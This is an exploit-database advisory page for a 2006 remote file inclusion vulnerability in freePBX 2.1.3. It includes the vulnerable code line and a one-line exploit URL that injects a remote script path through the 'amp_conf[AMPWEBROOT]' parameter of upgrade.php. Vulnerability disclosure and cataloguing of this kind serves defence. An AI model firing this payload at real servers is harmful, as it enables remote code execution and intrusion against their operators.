header-logo
Suggest Exploit
vendor:
FreePBX
by:
DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: FreePBX
Affected Version From: 2.1.3
Affected Version To: 2.1.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:freepbx:freepbx:2.1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

freePBX v2.1.3

A remote file inclusion vulnerability exists in freePBX v2.1.3. The vulnerability is due to the 'require_once' function in the upgrade.php script, which allows an attacker to include arbitrary files from remote locations. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the 'amp_conf[AMPWEBROOT]' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of freePBX.
Source

Exploit-DB raw data:

Script: freePBX
Version: v2.1.3
Script Download: http://puzzle.dl.sourceforge.net/sourceforge/amportal/freepbx-2.1.3.tgz
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]